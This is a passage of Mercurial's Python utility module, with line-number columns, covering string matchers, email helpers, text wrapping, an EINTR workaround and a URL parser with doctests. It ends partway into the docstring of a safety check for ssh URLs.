2204 2206 start, stop = lower(a), upper(b)
2205 2207 return lambda x: x >= start and x <= stop
2206 2208 else:
2207 2209 start, stop = lower(date), upper(date)
2208 2210 return lambda x: x >= start and x <= stop
2209 2211
2210 2212 def stringmatcher(pattern, casesensitive=True):
2211 2213 """
2212 2214 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2213 2215 returns the matcher name, pattern, and matcher function.
2214 2216 missing or unknown prefixes are treated as literal matches.
2215 2217
2216 2218 helper for tests:
2217 2219 >>> def test(pattern, *tests):
2218 2220 ... kind, pattern, matcher = stringmatcher(pattern)
2219 2221 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2220 2222 >>> def itest(pattern, *tests):
2221 2223 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2222 2224 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 2225
2224 2226 exact matching (no prefix):
2225 2227 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2226 2228 ('literal', 'abcdefg', [False, False, True])
2227 2229
2228 2230 regex matching ('re:' prefix)
2229 2231 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2230 2232 ('re', 'a.+b', [False, False, True])
2231 2233
2232 2234 force exact matches ('literal:' prefix)
2233 2235 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2234 2236 ('literal', 're:foobar', [False, True])
2235 2237
2236 2238 unknown prefixes are ignored and treated as literals
2237 2239 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2238 2240 ('literal', 'foo:bar', [False, False, True])
2239 2241
2240 2242 case insensitive regex matches
2241 2243 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2242 2244 ('re', 'A.+b', [False, False, True])
2243 2245
2244 2246 case insensitive literal matches
2245 2247 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2246 2248 ('literal', 'ABCDEFG', [False, False, True])
2247 2249 """
2248 2250 if pattern.startswith('re:'):
2249 2251 pattern = pattern[3:]
2250 2252 try:
2251 2253 flags = 0
2252 2254 if not casesensitive:
2253 2255 flags = remod.I
2254 2256 regex = remod.compile(pattern, flags)
2255 2257 except remod.error as e:
2256 2258 raise error.ParseError(_('invalid regular expression: %s')
2257 2259 % e)
2258 2260 return 're', pattern, regex.search
2259 2261 elif pattern.startswith('literal:'):
2260 2262 pattern = pattern[8:]
2261 2263
2262 2264 match = pattern.__eq__
2263 2265
2264 2266 if not casesensitive:
2265 2267 ipat = encoding.lower(pattern)
2266 2268 match = lambda s: ipat == encoding.lower(s)
2267 2269 return 'literal', pattern, match
2268 2270
2269 2271 def shortuser(user):
2270 2272 """Return a short representation of a user name or email address."""
2271 2273 f = user.find('@')
2272 2274 if f >= 0:
2273 2275 user = user[:f]
2274 2276 f = user.find('<')
2275 2277 if f >= 0:
2276 2278 user = user[f + 1:]
2277 2279 f = user.find(' ')
2278 2280 if f >= 0:
2279 2281 user = user[:f]
2280 2282 f = user.find('.')
2281 2283 if f >= 0:
2282 2284 user = user[:f]
2283 2285 return user
2284 2286
2285 2287 def emailuser(user):
2286 2288 """Return the user portion of an email address."""
2287 2289 f = user.find('@')
2288 2290 if f >= 0:
2289 2291 user = user[:f]
2290 2292 f = user.find('<')
2291 2293 if f >= 0:
2292 2294 user = user[f + 1:]
2293 2295 return user
2294 2296
2295 2297 def email(author):
2296 2298 '''get email of author.'''
2297 2299 r = author.find('>')
2298 2300 if r == -1:
2299 2301 r = None
2300 2302 return author[author.find('<') + 1:r]
2301 2303
2302 2304 def ellipsis(text, maxlength=400):
2303 2305 """Trim string to at most maxlength (default: 400) columns in display."""
2304 2306 return encoding.trim(text, maxlength, ellipsis='...')
2305 2307
2306 2308 def unitcountfn(*unittable):
2307 2309 '''return a function that renders a readable count of some quantity'''
2308 2310
2309 2311 def go(count):
2310 2312 for multiplier, divisor, format in unittable:
2311 2313 if abs(count) >= divisor * multiplier:
2312 2314 return format % (count / float(divisor))
2313 2315 return unittable[-1][2] % count
2314 2316
2315 2317 return go
2316 2318
2317 2319 def processlinerange(fromline, toline):
2318 2320 """Check that linerange <fromline>:<toline> makes sense and return a
2319 2321 0-based range.
2320 2322
2321 2323 >>> processlinerange(10, 20)
2322 2324 (9, 20)
2323 2325 >>> processlinerange(2, 1)
2324 2326 Traceback (most recent call last):
2325 2327 ...
2326 2328 ParseError: line range must be positive
2327 2329 >>> processlinerange(0, 5)
2328 2330 Traceback (most recent call last):
2329 2331 ...
2330 2332 ParseError: fromline must be strictly positive
2331 2333 """
2332 2334 if toline - fromline < 0:
2333 2335 raise error.ParseError(_("line range must be positive"))
2334 2336 if fromline < 1:
2335 2337 raise error.ParseError(_("fromline must be strictly positive"))
2336 2338 return fromline - 1, toline
2337 2339
2338 2340 bytecount = unitcountfn(
2339 2341 (100, 1 << 30, _('%.0f GB')),
2340 2342 (10, 1 << 30, _('%.1f GB')),
2341 2343 (1, 1 << 30, _('%.2f GB')),
2342 2344 (100, 1 << 20, _('%.0f MB')),
2343 2345 (10, 1 << 20, _('%.1f MB')),
2344 2346 (1, 1 << 20, _('%.2f MB')),
2345 2347 (100, 1 << 10, _('%.0f KB')),
2346 2348 (10, 1 << 10, _('%.1f KB')),
2347 2349 (1, 1 << 10, _('%.2f KB')),
2348 2350 (1, 1, _('%.0f bytes')),
2349 2351 )
2350 2352
2351 2353 # Matches a single EOL which can either be a CRLF where repeated CR
2352 2354 # are removed or a LF. We do not care about old Macintosh files, so a
2353 2355 # stray CR is an error.
2354 2356 _eolre = remod.compile(br'\r*\n')
2355 2357
2356 2358 def tolf(s):
2357 2359 return _eolre.sub('\n', s)
2358 2360
2359 2361 def tocrlf(s):
2360 2362 return _eolre.sub('\r\n', s)
2361 2363
2362 2364 if pycompat.oslinesep == '\r\n':
2363 2365 tonativeeol = tocrlf
2364 2366 fromnativeeol = tolf
2365 2367 else:
2366 2368 tonativeeol = pycompat.identity
2367 2369 fromnativeeol = pycompat.identity
2368 2370
2369 2371 def escapestr(s):
2370 2372 # call underlying function of s.encode('string_escape') directly for
2371 2373 # Python 3 compatibility
2372 2374 return codecs.escape_encode(s)[0]
2373 2375
2374 2376 def unescapestr(s):
2375 2377 return codecs.escape_decode(s)[0]
2376 2378
2377 2379 def forcebytestr(obj):
2378 2380 """Portably format an arbitrary object (e.g. exception) into a byte
2379 2381 string."""
2380 2382 try:
2381 2383 return pycompat.bytestr(obj)
2382 2384 except UnicodeEncodeError:
2383 2385 # non-ascii string, may be lossy
2384 2386 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2385 2387
2386 2388 def uirepr(s):
2387 2389 # Avoid double backslash in Windows path repr()
2388 2390 return repr(s).replace('\\\\', '\\')
2389 2391
2390 2392 # delay import of textwrap
2391 2393 def MBTextWrapper(**kwargs):
2392 2394 class tw(textwrap.TextWrapper):
2393 2395 """
2394 2396 Extend TextWrapper for width-awareness.
2395 2397
2396 2398 Neither number of 'bytes' in any encoding nor 'characters' is
2397 2399 appropriate to calculate terminal columns for specified string.
2398 2400
2399 2401 Original TextWrapper implementation uses built-in 'len()' directly,
2400 2402 so overriding is needed to use width information of each characters.
2401 2403
2402 2404 In addition, characters classified into 'ambiguous' width are
2403 2405 treated as wide in East Asian area, but as narrow in other.
2404 2406
2405 2407 This requires use decision to determine width of such characters.
2406 2408 """
2407 2409 def _cutdown(self, ucstr, space_left):
2408 2410 l = 0
2409 2411 colwidth = encoding.ucolwidth
2410 2412 for i in xrange(len(ucstr)):
2411 2413 l += colwidth(ucstr[i])
2412 2414 if space_left < l:
2413 2415 return (ucstr[:i], ucstr[i:])
2414 2416 return ucstr, ''
2415 2417
2416 2418 # overriding of base class
2417 2419 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2418 2420 space_left = max(width - cur_len, 1)
2419 2421
2420 2422 if self.break_long_words:
2421 2423 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2422 2424 cur_line.append(cut)
2423 2425 reversed_chunks[-1] = res
2424 2426 elif not cur_line:
2425 2427 cur_line.append(reversed_chunks.pop())
2426 2428
2427 2429 # this overriding code is imported from TextWrapper of Python 2.6
2428 2430 # to calculate columns of string by 'encoding.ucolwidth()'
2429 2431 def _wrap_chunks(self, chunks):
2430 2432 colwidth = encoding.ucolwidth
2431 2433
2432 2434 lines = []
2433 2435 if self.width <= 0:
2434 2436 raise ValueError("invalid width %r (must be > 0)" % self.width)
2435 2437
2436 2438 # Arrange in reverse order so items can be efficiently popped
2437 2439 # from a stack of chucks.
2438 2440 chunks.reverse()
2439 2441
2440 2442 while chunks:
2441 2443
2442 2444 # Start the list of chunks that will make up the current line.
2443 2445 # cur_len is just the length of all the chunks in cur_line.
2444 2446 cur_line = []
2445 2447 cur_len = 0
2446 2448
2447 2449 # Figure out which static string will prefix this line.
2448 2450 if lines:
2449 2451 indent = self.subsequent_indent
2450 2452 else:
2451 2453 indent = self.initial_indent
2452 2454
2453 2455 # Maximum width for this line.
2454 2456 width = self.width - len(indent)
2455 2457
2456 2458 # First chunk on line is whitespace -- drop it, unless this
2457 2459 # is the very beginning of the text (i.e. no lines started yet).
2458 2460 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2459 2461 del chunks[-1]
2460 2462
2461 2463 while chunks:
2462 2464 l = colwidth(chunks[-1])
2463 2465
2464 2466 # Can at least squeeze this chunk onto the current line.
2465 2467 if cur_len + l <= width:
2466 2468 cur_line.append(chunks.pop())
2467 2469 cur_len += l
2468 2470
2469 2471 # Nope, this line is full.
2470 2472 else:
2471 2473 break
2472 2474
2473 2475 # The current line is full, and the next chunk is too big to
2474 2476 # fit on *any* line (not just this one).
2475 2477 if chunks and colwidth(chunks[-1]) > width:
2476 2478 self._handle_long_word(chunks, cur_line, cur_len, width)
2477 2479
2478 2480 # If the last chunk on this line is all whitespace, drop it.
2479 2481 if (self.drop_whitespace and
2480 2482 cur_line and cur_line[-1].strip() == r''):
2481 2483 del cur_line[-1]
2482 2484
2483 2485 # Convert current line back to a string and store it in list
2484 2486 # of all lines (return value).
2485 2487 if cur_line:
2486 2488 lines.append(indent + r''.join(cur_line))
2487 2489
2488 2490 return lines
2489 2491
2490 2492 global MBTextWrapper
2491 2493 MBTextWrapper = tw
2492 2494 return tw(**kwargs)
2493 2495
2494 2496 def wrap(line, width, initindent='', hangindent=''):
2495 2497 maxindent = max(len(hangindent), len(initindent))
2496 2498 if width <= maxindent:
2497 2499 # adjust for weird terminal size
2498 2500 width = max(78, maxindent + 1)
2499 2501 line = line.decode(pycompat.sysstr(encoding.encoding),
2500 2502 pycompat.sysstr(encoding.encodingmode))
2501 2503 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2502 2504 pycompat.sysstr(encoding.encodingmode))
2503 2505 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2504 2506 pycompat.sysstr(encoding.encodingmode))
2505 2507 wrapper = MBTextWrapper(width=width,
2506 2508 initial_indent=initindent,
2507 2509 subsequent_indent=hangindent)
2508 2510 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2509 2511
2510 2512 if (pyplatform.python_implementation() == 'CPython' and
2511 2513 sys.version_info < (3, 0)):
2512 2514 # There is an issue in CPython that some IO methods do not handle EINTR
2513 2515 # correctly. The following table shows what CPython version (and functions)
2514 2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2515 2517 #
2516 2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2517 2519 # --------------------------------------------------
2518 2520 # fp.__iter__ | buggy | buggy | okay
2519 2521 # fp.read* | buggy | okay [1] | okay
2520 2522 #
2521 2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2522 2524 #
2523 2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2524 2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2525 2527 #
2526 2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2527 2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2528 2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2529 2531 # fp.__iter__ but not other fp.read* methods.
2530 2532 #
2531 2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2532 2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2533 2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2534 2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2535 2537 # to minimize the performance impact.
2536 2538 if sys.version_info >= (2, 7, 4):
2537 2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2538 2540 def _safeiterfile(fp):
2539 2541 return iter(fp.readline, '')
2540 2542 else:
2541 2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2542 2544 # note: this may block longer than necessary because of bufsize.
2543 2545 def _safeiterfile(fp, bufsize=4096):
2544 2546 fd = fp.fileno()
2545 2547 line = ''
2546 2548 while True:
2547 2549 try:
2548 2550 buf = os.read(fd, bufsize)
2549 2551 except OSError as ex:
2550 2552 # os.read only raises EINTR before any data is read
2551 2553 if ex.errno == errno.EINTR:
2552 2554 continue
2553 2555 else:
2554 2556 raise
2555 2557 line += buf
2556 2558 if '\n' in buf:
2557 2559 splitted = line.splitlines(True)
2558 2560 line = ''
2559 2561 for l in splitted:
2560 2562 if l[-1] == '\n':
2561 2563 yield l
2562 2564 else:
2563 2565 line = l
2564 2566 if not buf:
2565 2567 break
2566 2568 if line:
2567 2569 yield line
2568 2570
2569 2571 def iterfile(fp):
2570 2572 fastpath = True
2571 2573 if type(fp) is file:
2572 2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2573 2575 if fastpath:
2574 2576 return fp
2575 2577 else:
2576 2578 return _safeiterfile(fp)
2577 2579 else:
2578 2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2579 2581 def iterfile(fp):
2580 2582 return fp
2581 2583
2582 2584 def iterlines(iterator):
2583 2585 for chunk in iterator:
2584 2586 for line in chunk.splitlines():
2585 2587 yield line
2586 2588
2587 2589 def expandpath(path):
2588 2590 return os.path.expanduser(os.path.expandvars(path))
2589 2591
2590 2592 def hgcmd():
2591 2593 """Return the command used to execute current hg
2592 2594
2593 2595 This is different from hgexecutable() because on Windows we want
2594 2596 to avoid things opening new shell windows like batch files, so we
2595 2597 get either the python call or current executable.
2596 2598 """
2597 2599 if mainfrozen():
2598 2600 if getattr(sys, 'frozen', None) == 'macosx_app':
2599 2601 # Env variable set by py2app
2600 2602 return [encoding.environ['EXECUTABLEPATH']]
2601 2603 else:
2602 2604 return [pycompat.sysexecutable]
2603 2605 return gethgcmd()
2604 2606
2605 2607 def rundetached(args, condfn):
2606 2608 """Execute the argument list in a detached process.
2607 2609
2608 2610 condfn is a callable which is called repeatedly and should return
2609 2611 True once the child process is known to have started successfully.
2610 2612 At this point, the child process PID is returned. If the child
2611 2613 process fails to start or finishes before condfn() evaluates to
2612 2614 True, return -1.
2613 2615 """
2614 2616 # Windows case is easier because the child process is either
2615 2617 # successfully starting and validating the condition or exiting
2616 2618 # on failure. We just poll on its PID. On Unix, if the child
2617 2619 # process fails to start, it will be left in a zombie state until
2618 2620 # the parent wait on it, which we cannot do since we expect a long
2619 2621 # running process on success. Instead we listen for SIGCHLD telling
2620 2622 # us our child process terminated.
2621 2623 terminated = set()
2622 2624 def handler(signum, frame):
2623 2625 terminated.add(os.wait())
2624 2626 prevhandler = None
2625 2627 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2626 2628 if SIGCHLD is not None:
2627 2629 prevhandler = signal.signal(SIGCHLD, handler)
2628 2630 try:
2629 2631 pid = spawndetached(args)
2630 2632 while not condfn():
2631 2633 if ((pid in terminated or not testpid(pid))
2632 2634 and not condfn()):
2633 2635 return -1
2634 2636 time.sleep(0.1)
2635 2637 return pid
2636 2638 finally:
2637 2639 if prevhandler is not None:
2638 2640 signal.signal(signal.SIGCHLD, prevhandler)
2639 2641
2640 2642 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2641 2643 """Return the result of interpolating items in the mapping into string s.
2642 2644
2643 2645 prefix is a single character string, or a two character string with
2644 2646 a backslash as the first character if the prefix needs to be escaped in
2645 2647 a regular expression.
2646 2648
2647 2649 fn is an optional function that will be applied to the replacement text
2648 2650 just before replacement.
2649 2651
2650 2652 escape_prefix is an optional flag that allows using doubled prefix for
2651 2653 its escaping.
2652 2654 """
2653 2655 fn = fn or (lambda s: s)
2654 2656 patterns = '|'.join(mapping.keys())
2655 2657 if escape_prefix:
2656 2658 patterns += '|' + prefix
2657 2659 if len(prefix) > 1:
2658 2660 prefix_char = prefix[1:]
2659 2661 else:
2660 2662 prefix_char = prefix
2661 2663 mapping[prefix_char] = prefix_char
2662 2664 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2663 2665 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2664 2666
2665 2667 def getport(port):
2666 2668 """Return the port for a given network service.
2667 2669
2668 2670 If port is an integer, it's returned as is. If it's a string, it's
2669 2671 looked up using socket.getservbyname(). If there's no matching
2670 2672 service, error.Abort is raised.
2671 2673 """
2672 2674 try:
2673 2675 return int(port)
2674 2676 except ValueError:
2675 2677 pass
2676 2678
2677 2679 try:
2678 2680 return socket.getservbyname(port)
2679 2681 except socket.error:
2680 2682 raise Abort(_("no port number associated with service '%s'") % port)
2681 2683
2682 2684 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2683 2685 '0': False, 'no': False, 'false': False, 'off': False,
2684 2686 'never': False}
2685 2687
2686 2688 def parsebool(s):
2687 2689 """Parse s into a boolean.
2688 2690
2689 2691 If s is not a valid boolean, returns None.
2690 2692 """
2691 2693 return _booleans.get(s.lower(), None)
2692 2694
2693 2695 _hextochr = dict((a + b, chr(int(a + b, 16)))
2694 2696 for a in string.hexdigits for b in string.hexdigits)
2695 2697
2696 2698 class url(object):
2697 2699 r"""Reliable URL parser.
2698 2700
2699 2701 This parses URLs and provides attributes for the following
2700 2702 components:
2701 2703
2702 2704 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2703 2705
2704 2706 Missing components are set to None. The only exception is
2705 2707 fragment, which is set to '' if present but empty.
2706 2708
2707 2709 If parsefragment is False, fragment is included in query. If
2708 2710 parsequery is False, query is included in path. If both are
2709 2711 False, both fragment and query are included in path.
2710 2712
2711 2713 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2712 2714
2713 2715 Note that for backward compatibility reasons, bundle URLs do not
2714 2716 take host names. That means 'bundle://../' has a path of '../'.
2715 2717
2716 2718 Examples:
2717 2719
2718 2720 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2719 2721 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2720 2722 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2721 2723 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2722 2724 >>> url(b'file:///home/joe/repo')
2723 2725 <url scheme: 'file', path: '/home/joe/repo'>
2724 2726 >>> url(b'file:///c:/temp/foo/')
2725 2727 <url scheme: 'file', path: 'c:/temp/foo/'>
2726 2728 >>> url(b'bundle:foo')
2727 2729 <url scheme: 'bundle', path: 'foo'>
2728 2730 >>> url(b'bundle://../foo')
2729 2731 <url scheme: 'bundle', path: '../foo'>
2730 2732 >>> url(br'c:\foo\bar')
2731 2733 <url path: 'c:\\foo\\bar'>
2732 2734 >>> url(br'\\blah\blah\blah')
2733 2735 <url path: '\\\\blah\\blah\\blah'>
2734 2736 >>> url(br'\\blah\blah\blah#baz')
2735 2737 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2736 2738 >>> url(br'file:///C:\users\me')
2737 2739 <url scheme: 'file', path: 'C:\\users\\me'>
2738 2740
2739 2741 Authentication credentials:
2740 2742
2741 2743 >>> url(b'ssh://joe:xyz@x/repo')
2742 2744 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2743 2745 >>> url(b'ssh://joe@x/repo')
2744 2746 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2745 2747
2746 2748 Query strings and fragments:
2747 2749
2748 2750 >>> url(b'http://host/a?b#c')
2749 2751 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2750 2752 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2751 2753 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2752 2754
2753 2755 Empty path:
2754 2756
2755 2757 >>> url(b'')
2756 2758 <url path: ''>
2757 2759 >>> url(b'#a')
2758 2760 <url path: '', fragment: 'a'>
2759 2761 >>> url(b'http://host/')
2760 2762 <url scheme: 'http', host: 'host', path: ''>
2761 2763 >>> url(b'http://host/#a')
2762 2764 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2763 2765
2764 2766 Only scheme:
2765 2767
2766 2768 >>> url(b'http:')
2767 2769 <url scheme: 'http'>
2768 2770 """
2769 2771
2770 2772 _safechars = "!~*'()+"
2771 2773 _safepchars = "/!~*'()+:\\"
2772 2774 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2773 2775
2774 2776 def __init__(self, path, parsequery=True, parsefragment=True):
2775 2777 # We slowly chomp away at path until we have only the path left
2776 2778 self.scheme = self.user = self.passwd = self.host = None
2777 2779 self.port = self.path = self.query = self.fragment = None
2778 2780 self._localpath = True
2779 2781 self._hostport = ''
2780 2782 self._origpath = path
2781 2783
2782 2784 if parsefragment and '#' in path:
2783 2785 path, self.fragment = path.split('#', 1)
2784 2786
2785 2787 # special case for Windows drive letters and UNC paths
2786 2788 if hasdriveletter(path) or path.startswith('\\\\'):
2787 2789 self.path = path
2788 2790 return
2789 2791
2790 2792 # For compatibility reasons, we can't handle bundle paths as
2791 2793 # normal URLS
2792 2794 if path.startswith('bundle:'):
2793 2795 self.scheme = 'bundle'
2794 2796 path = path[7:]
2795 2797 if path.startswith('//'):
2796 2798 path = path[2:]
2797 2799 self.path = path
2798 2800 return
2799 2801
2800 2802 if self._matchscheme(path):
2801 2803 parts = path.split(':', 1)
2802 2804 if parts[0]:
2803 2805 self.scheme, path = parts
2804 2806 self._localpath = False
2805 2807
2806 2808 if not path:
2807 2809 path = None
2808 2810 if self._localpath:
2809 2811 self.path = ''
2810 2812 return
2811 2813 else:
2812 2814 if self._localpath:
2813 2815 self.path = path
2814 2816 return
2815 2817
2816 2818 if parsequery and '?' in path:
2817 2819 path, self.query = path.split('?', 1)
2818 2820 if not path:
2819 2821 path = None
2820 2822 if not self.query:
2821 2823 self.query = None
2822 2824
2823 2825 # // is required to specify a host/authority
2824 2826 if path and path.startswith('//'):
2825 2827 parts = path[2:].split('/', 1)
2826 2828 if len(parts) > 1:
2827 2829 self.host, path = parts
2828 2830 else:
2829 2831 self.host = parts[0]
2830 2832 path = None
2831 2833 if not self.host:
2832 2834 self.host = None
2833 2835 # path of file:///d is /d
2834 2836 # path of file:///d:/ is d:/, not /d:/
2835 2837 if path and not hasdriveletter(path):
2836 2838 path = '/' + path
2837 2839
2838 2840 if self.host and '@' in self.host:
2839 2841 self.user, self.host = self.host.rsplit('@', 1)
2840 2842 if ':' in self.user:
2841 2843 self.user, self.passwd = self.user.split(':', 1)
2842 2844 if not self.host:
2843 2845 self.host = None
2844 2846
2845 2847 # Don't split on colons in IPv6 addresses without ports
2846 2848 if (self.host and ':' in self.host and
2847 2849 not (self.host.startswith('[') and self.host.endswith(']'))):
2848 2850 self._hostport = self.host
2849 2851 self.host, self.port = self.host.rsplit(':', 1)
2850 2852 if not self.host:
2851 2853 self.host = None
2852 2854
2853 2855 if (self.host and self.scheme == 'file' and
2854 2856 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2855 2857 raise Abort(_('file:// URLs can only refer to localhost'))
2856 2858
2857 2859 self.path = path
2858 2860
2859 2861 # leave the query string escaped
2860 2862 for a in ('user', 'passwd', 'host', 'port',
2861 2863 'path', 'fragment'):
2862 2864 v = getattr(self, a)
2863 2865 if v is not None:
2864 2866 setattr(self, a, urlreq.unquote(v))
2865 2867
2866 2868 @encoding.strmethod
2867 2869 def __repr__(self):
2868 2870 attrs = []
2869 2871 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2870 2872 'query', 'fragment'):
2871 2873 v = getattr(self, a)
2872 2874 if v is not None:
2873 2875 attrs.append('%s: %r' % (a, v))
2874 2876 return '<url %s>' % ', '.join(attrs)
2875 2877
2876 2878 def __bytes__(self):
2877 2879 r"""Join the URL's components back into a URL string.
2878 2880
2879 2881 Examples:
2880 2882
2881 2883 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2882 2884 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2883 2885 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2884 2886 'http://user:pw@host:80/?foo=bar&baz=42'
2885 2887 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2886 2888 'http://user:pw@host:80/?foo=bar%3dbaz'
2887 2889 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2888 2890 'ssh://user:pw@[::1]:2200//home/joe#'
2889 2891 >>> bytes(url(b'http://localhost:80//'))
2890 2892 'http://localhost:80//'
2891 2893 >>> bytes(url(b'http://localhost:80/'))
2892 2894 'http://localhost:80/'
2893 2895 >>> bytes(url(b'http://localhost:80'))
2894 2896 'http://localhost:80/'
2895 2897 >>> bytes(url(b'bundle:foo'))
2896 2898 'bundle:foo'
2897 2899 >>> bytes(url(b'bundle://../foo'))
2898 2900 'bundle:../foo'
2899 2901 >>> bytes(url(b'path'))
2900 2902 'path'
2901 2903 >>> bytes(url(b'file:///tmp/foo/bar'))
2902 2904 'file:///tmp/foo/bar'
2903 2905 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2904 2906 'file:///c:/tmp/foo/bar'
2905 2907 >>> print(url(br'bundle:foo\bar'))
2906 2908 bundle:foo\bar
2907 2909 >>> print(url(br'file:///D:\data\hg'))
2908 2910 file:///D:\data\hg
2909 2911 """
2910 2912 if self._localpath:
2911 2913 s = self.path
2912 2914 if self.scheme == 'bundle':
2913 2915 s = 'bundle:' + s
2914 2916 if self.fragment:
2915 2917 s += '#' + self.fragment
2916 2918 return s
2917 2919
2918 2920 s = self.scheme + ':'
2919 2921 if self.user or self.passwd or self.host:
2920 2922 s += '//'
2921 2923 elif self.scheme and (not self.path or self.path.startswith('/')
2922 2924 or hasdriveletter(self.path)):
2923 2925 s += '//'
2924 2926 if hasdriveletter(self.path):
2925 2927 s += '/'
2926 2928 if self.user:
2927 2929 s += urlreq.quote(self.user, safe=self._safechars)
2928 2930 if self.passwd:
2929 2931 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2930 2932 if self.user or self.passwd:
2931 2933 s += '@'
2932 2934 if self.host:
2933 2935 if not (self.host.startswith('[') and self.host.endswith(']')):
2934 2936 s += urlreq.quote(self.host)
2935 2937 else:
2936 2938 s += self.host
2937 2939 if self.port:
2938 2940 s += ':' + urlreq.quote(self.port)
2939 2941 if self.host:
2940 2942 s += '/'
2941 2943 if self.path:
2942 2944 # TODO: similar to the query string, we should not unescape the
2943 2945 # path when we store it, the path might contain '%2f' = '/',
2944 2946 # which we should *not* escape.
2945 2947 s += urlreq.quote(self.path, safe=self._safepchars)
2946 2948 if self.query:
2947 2949 # we store the query in escaped form.
2948 2950 s += '?' + self.query
2949 2951 if self.fragment is not None:
2950 2952 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2951 2953 return s
2952 2954
2953 2955 __str__ = encoding.strmethod(__bytes__)
2954 2956
2955 2957 def authinfo(self):
2956 2958 user, passwd = self.user, self.passwd
2957 2959 try:
2958 2960 self.user, self.passwd = None, None
2959 2961 s = bytes(self)
2960 2962 finally:
2961 2963 self.user, self.passwd = user, passwd
2962 2964 if not self.user:
2963 2965 return (s, None)
2964 2966 # authinfo[1] is passed to urllib2 password manager, and its
2965 2967 # URIs must not contain credentials. The host is passed in the
2966 2968 # URIs list because Python < 2.4.3 uses only that to search for
2967 2969 # a password.
2968 2970 return (s, (None, (s, self.host),
2969 2971 self.user, self.passwd or ''))
2970 2972
2971 2973 def isabs(self):
2972 2974 if self.scheme and self.scheme != 'file':
2973 2975 return True # remote URL
2974 2976 if hasdriveletter(self.path):
2975 2977 return True # absolute for our purposes - can't be joined()
2976 2978 if self.path.startswith(br'\\'):
2977 2979 return True # Windows UNC path
2978 2980 if self.path.startswith('/'):
2979 2981 return True # POSIX-style
2980 2982 return False
2981 2983
2982 2984 def localpath(self):
2983 2985 if self.scheme == 'file' or self.scheme == 'bundle':
2984 2986 path = self.path or '/'
2985 2987 # For Windows, we need to promote hosts containing drive
2986 2988 # letters to paths with drive letters.
2987 2989 if hasdriveletter(self._hostport):
2988 2990 path = self._hostport + '/' + self.path
2989 2991 elif (self.host is not None and self.path
2990 2992 and not hasdriveletter(path)):
2991 2993 path = '/' + path
2992 2994 return path
2993 2995 return self._origpath
2994 2996
2995 2997 def islocal(self):
2996 2998 '''whether localpath will return something that posixfile can open'''
2997 2999 return (not self.scheme or self.scheme == 'file'
2998 3000 or self.scheme == 'bundle')
2999 3001
3000 3002 def hasscheme(path):
3001 3003 return bool(url(path).scheme)
3002 3004
3003 3005 def hasdriveletter(path):
3004 3006 return path and path[1:2] == ':' and path[0:1].isalpha()
3005 3007
3006 3008 def urllocalpath(path):
3007 3009 return url(path, parsequery=False, parsefragment=False).localpath()
3008 3010
3009 3011 def checksafessh(path):
3010 3012 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3011 3013
3012 3014 This is a sanity check for ssh urls. ssh will parse the first item as
